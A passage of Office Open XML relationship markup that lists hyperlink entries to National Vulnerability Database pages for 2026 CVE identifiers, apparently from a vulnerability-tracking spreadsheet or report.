Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73077" TargetMode="External" Id="rId1613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73629" TargetMode="External" Id="rId1614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75060" TargetMode="External" Id="rId1615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75855" TargetMode="External" Id="rId1616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75999" TargetMode="External" Id="rId1617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76228" TargetMode="External" Id="rId1618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76229" TargetMode="External" Id="rId1619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76230" TargetMode="External" Id="rId1620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76231" TargetMode="External" Id="rId1621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76232" TargetMode="External" Id="rId1622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76233" TargetMode="External" Id="rId1623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76838" TargetMode="External" Id="rId1624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76878" TargetMode="External" Id="rId1625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77118" TargetMode="External" Id="rId1626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77827" TargetMode="External" Id="rId1627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80118" TargetMode="External" Id="rId1628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82563" TargetMode="External" Id="rId1629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85613" TargetMode="External" Id="rId1630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85616" TargetMode="External" Id="rId1631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85651" TargetMode="External" Id="rId1632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86502" TargetMode="External" Id="rId1633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86741" TargetMode="External" Id="rId1634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86751" TargetMode="External" Id="rId1635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86819" TargetMode="External" Id="rId1636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87811" TargetMode="External" Id="rId1637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87813" TargetMode="External" Id="rId1638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87814" TargetMode="External" Id="rId1639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87815" TargetMode="External" Id="rId1640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88022" TargetMode="External" Id="rId1641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88890" TargetMode="External" Id="rId1642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19203" TargetMode="External" Id="rId1643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28808" TargetMode="External" Id="rId1644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-29988" TargetMode="External" Id="rId1645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38820" TargetMode="External" Id="rId1646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45730" TargetMode="External" Id="rId1647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48105" TargetMode="External" Id="rId1648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48106" TargetMode="External" Id="rId1649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49224" TargetMode="External" Id="rId1650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49225" TargetMode="External" Id="rId1651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49226" TargetMode="External" Id="rId1652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52769" TargetMode="External" Id="rId1653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52771" TargetMode="External" Id="rId1654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52877" TargetMode="External" Id="rId1655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53507" TargetMode="External" Id="rId1656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54100" TargetMode="External" Id="rId1657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57164" TargetMode="External" Id="rId1658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69646" TargetMode="External" Id="rId1659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70473" TargetMode="External" Id="rId1660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70476" TargetMode="External" Id="rId1661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73241" TargetMode="External" Id="rId1662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73242" TargetMode="External" Id="rId1663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73292" TargetMode="External" Id="rId1664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73541" TargetMode="External" Id="rId1665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75842" TargetMode="External" Id="rId1666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75912" TargetMode="External" Id="rId1667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76225" TargetMode="External" Id="rId1668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77104" TargetMode="External" Id="rId1669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80469" TargetMode="External" Id="rId1670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81821" TargetMode="External" Id="rId1671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81822" TargetMode="External" Id="rId1672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82404" TargetMode="External" Id="rId1673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82662" TargetMode="External" Id="rId1674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82750" TargetMode="External" Id="rId1675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82751" TargetMode="External" Id="rId1676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84173" TargetMode="External" Id="rId1677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84195" TargetMode="External" Id="rId1678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84196" TargetMode="External" Id="rId1679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85048" TargetMode="External" Id="rId1680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85091" TargetMode="External" Id="rId1681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85211" TargetMode="External" Id="rId1682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85538" TargetMode="External" Id="rId1683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86750" TargetMode="External" Id="rId1684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86771" TargetMode="External" Id="rId1685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87034" TargetMode="External" Id="rId1686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87090" TargetMode="External" Id="rId1687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87479" TargetMode="External" Id="rId1688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87480" TargetMode="External" Id="rId1689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87481" TargetMode="External" Id="rId1690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87487" TargetMode="External" Id="rId1691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87506" TargetMode="External" Id="rId1692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87510" TargetMode="External" Id="rId1693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87524" TargetMode="External" Id="rId1694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87553" TargetMode="External" Id="rId1695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87572" TargetMode="External" Id="rId1696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87578" TargetMode="External" Id="rId1697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87582" TargetMode="External" Id="rId1698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87604" TargetMode="External" Id="rId1699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87616" TargetMode="External" Id="rId1700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87618" TargetMode="External" Id="rId1701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87628" TargetMode="External" Id="rId1702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87639" TargetMode="External" Id="rId1703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87644" TargetMode="External" Id="rId1704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87648" TargetMode="External" Id="rId1705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88883" TargetMode="External" Id="rId1706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12855" TargetMode="External" Id="rId1707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18664" TargetMode="External" Id="rId1708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18730" TargetMode="External" Id="rId1709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19401" TargetMode="External" Id="rId1710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19538" TargetMode="External" Id="rId1711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24262" TargetMode="External" Id="rId1712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24263" TargetMode="External" Id="rId1713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26007" TargetMode="External" Id="rId1714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28498" TargetMode="External" Id="rId1715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33810" TargetMode="External" Id="rId1716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41424" TargetMode="External" Id="rId1717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41604" TargetMode="External" Id="rId1718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44487" TargetMode="External" Id="rId1719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44506" TargetMode="External" Id="rId1720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47626" TargetMode="External" Id="rId1721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47719" TargetMode="External" Id="rId1722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48763" TargetMode="External" Id="rId1723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48771" TargetMode="External" Id="rId1724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52767" TargetMode="External" Id="rId1725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53500" TargetMode="External" Id="rId1726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53501" TargetMode="External" Id="rId1727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53761" TargetMode="External" Id="rId1728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53938" TargetMode="External" Id="rId1729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54556" TargetMode="External" Id="rId1730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54600" TargetMode="External" Id="rId1731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55528" TargetMode="External" Id="rId1732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55533" TargetMode="External" Id="rId1733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55571" TargetMode="External" Id="rId1734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56670" TargetMode="External" Id="rId1735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56672" TargetMode="External" Id="rId1736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58010" TargetMode="External" Id="rId1737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58012" TargetMode="External" Id="rId1738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58013" TargetMode="External" Id="rId1739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61638" TargetMode="External" Id="rId1740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62673" TargetMode="External" Id="rId1741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62959" TargetMode="External" Id="rId1742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63135" TargetMode="External" Id="rId1743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63376" TargetMode="External" Id="rId1744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63407" TargetMode="External" Id="rId1745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63409" TargetMode="External" Id="rId1746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64380" TargetMode="External" Id="rId1747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6485" TargetMode="External" Id="rId1748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65832" TargetMode="External" Id="rId1749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67354" TargetMode="External" Id="rId1750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67355" TargetMode="External" Id="rId1751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67398" TargetMode="External" Id="rId1752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67607" TargetMode="External" Id="rId1753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69247" TargetMode="External" Id="rId1754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69820" TargetMode="External" Id="rId1755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69846" TargetMode="External" Id="rId1756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69874" TargetMode="External" Id="rId1757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69906" TargetMode="External" Id="rId1758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70486" TargetMode="External" Id="rId1759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71315" TargetMode="External" Id="rId1760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72922" TargetMode="External" Id="rId1761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72958" TargetMode="External" Id="rId1762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72961" TargetMode="External" Id="rId1763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72962" TargetMode="External" Id="rId1764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73136" TargetMode="External" Id="rId1765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73214" TargetMode="External" Id="rId1766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73303" TargetMode="External" Id="rId1767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73310" TargetMode="External" Id="rId1768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73658" TargetMode="External" Id="rId1769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73666" TargetMode="External" Id="rId1770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74907" TargetMode="External" Id="rId1771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75594" TargetMode="External" Id="rId1772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76191" TargetMode="External" Id="rId1773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76202" TargetMode="External" Id="rId1774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77348" TargetMode="External" Id="rId1775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77358" TargetMode="External" Id="rId1776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77634" TargetMode="External" Id="rId1777" /><Relationship 